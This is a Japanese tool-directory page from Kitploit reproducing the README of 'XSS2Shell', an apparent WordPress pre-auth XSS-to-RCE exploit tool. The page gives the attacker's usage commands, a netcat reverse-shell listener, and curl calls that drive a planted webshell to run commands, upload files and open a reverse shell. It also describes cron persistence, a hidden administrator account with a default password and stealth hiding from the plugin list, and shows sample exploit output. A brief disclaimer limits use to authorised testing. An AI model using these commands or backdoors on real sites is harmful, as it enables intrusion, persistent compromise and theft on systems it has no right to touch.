Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/g0d150ne/xss2shell
永続化メカニズムエクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイトコマンド&コントロールレッドチーミングリモートアクセスツールペイロード開発
GitHubg0d150ne/xss2shell

XSS2Shell

WordPressの認証前XSS (CVE-2026-64638) を悪用してリモートコード実行を達成し、永続化、ファイルアップロード、リバースシェル、ステルスオプションを備えたAES暗号化バックドアWebシェルをインストールします。認可されたレッドチーム演習向けです。

10日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

XSS2Shell ULTIMATE v3.0

WordPress 事前認証 XSS → RCE チェーンエクスプロイト
G0D150NE 開発

📌 機能

  • 🔍 XSS と WordPress バージョンを自動検出
  • 🎯 3 モード: Auto、XSS、Direct
  • 📡 資格情報を取得するコールバックサーバー
  • 🐚 複数の実行方法に対応した WebShell
  • 🔄 永続化(cron ジョブ、隠し管理者、自己複製)
  • 📁 ファイルのアップロード/ダウンロード
  • 🖥️ ワンクリックリバースシェル
  • 🛡️ ステルスモード(プラグイン一覧から隠蔽)
  • 🔐 AES-256 暗号化バックドア

📦 インストール

root@kitploit:~
# Clone
git clone https://github.com/g0d150ne/XSS2Shell.git
cd XSS2Shell

# Install dependencies
pip3 install requests beautifulsoup4 cryptography

# Run
python3 poc.py -h

🚀 クイックスタート

1. リスナーのセットアップ

root@kitploit:~
# Open terminal for reverse shell
nc -lvnp 4444

2. エクスプロイトの実行

オートモード(推奨)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --lhost 192.168.1.100

XSS モード(資格情報なし)

root@kitploit:~
python3 poc.py http://target.com --mode xss --lhost 192.168.1.100

ダイレクトモード(資格情報あり)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --mode direct --lhost 192.168.1.100

🔧 コマンド実行

WebShell インストール後:

root@kitploit:~
# Base64 encoded (recommended)
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?b2h='$(echo -n 'id' | base64)

# Plain command
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?cmd=whoami'

# Upload file
curl -F '[email protected]' http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php

# Reverse shell
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?rev=1'

🎯 使用例

root@kitploit:~
# 1. Auto scan + exploit
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5

# 2. XSS chain without credentials
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5

# 3. Custom port & plugin name
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --lport 1337 --slug backdoor

# 4. Change backdoor password
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --backdoor-pass MySecretPass

# 5. Custom callback port
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5 --callback-port 9999

📝 コマンドオプション

🐚 WebShell の機能

エクスプロイト成功後:

作成される隠し管理者:

  • ユーザー名: sysadmin_{slug}
  • パスワード: {backdoor-pass}(デフォルト: G0D150NE)

📸 出力例

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║  Target   : http://wordpress-site.com
║  Attacker : 192.168.1.100:4444
║  Plugin   : g0d150ne
║  Mode     : AUTO
╚══════════════════════════════════════════════════════════════════╝

[•] Detecting WordPress version...
[+] WordPress version: 6.7.0
[•] Testing XSS vulnerability...
[+] XSS vulnerable! Vector: <area id=ajaxurl...
[+] Login successful as admin
[+] Plugin uploaded successfully
[+] Webshell ready: http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
[+] Test: uid=33(www-data)

╔══════════════════════════════════════════════════════════════════╗
║  [+] EXPLOIT SUCCESSFUL                                          ║
╠══════════════════════════════════════════════════════════════════╣
║  WEBSHELL:                                                       ║
║    http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php    ║
║  ADMIN USER CREATED:                                             ║
║    Username: sysadmin_g0d150ne                                   ║
║    Password: G0D150NE                                            ║
╚══════════════════════════════════════════════════════════════════╝

🔧 トラブルシューティング

⚠️ 免責事項

教育目的および許可されたテストのみを対象としています。
所有しているシステム、または明示的なテスト許可を得たシステムでのみ使用してください。
作者は、不正使用または損害について一切の責任を負いません。

📞 連絡先

  • 作者: G0D150NE
  • CVE: CVE-2026-64638
ツールをダウンロード
オプション説明デフォルト
target対象の WordPress URL必須
-u, --usernameWordPress 管理者ユーザー名-
-p, --wp-passWordPress 管理者パスワード-
--lhostリスナーの IP アドレス127.0.0.1
--lportリスナーのポート4444
--modeエクスプロイトモード(auto/xss/direct)auto
--slugプラグインのスラッグ名g0d150ne
--callback-portコールバックサーバーのポート9090
--backdoor-passバックドアのパスワードG0D150NE
機能コマンド
コマンド実行?b2h=BASE64_CMD
ファイルアップロード-F '[email protected]'
リバースシェル?rev=1
プレーンコマンド?cmd=id
暗号化バックドア?decrypt=AES_DATA
問題解決方法
ModuleNotFoundErrorpip3 install requests beautifulsoup4 cryptography
Connection refusedリスナーを確認: nc -lvnp 4444
Login failed資格情報を確認するか、XSS モードを使用
Plugin upload failed権限を確認し、別のスラッグを使用
Argument conflictwp-pass には -p、バックドアには --backdoor-pass を使用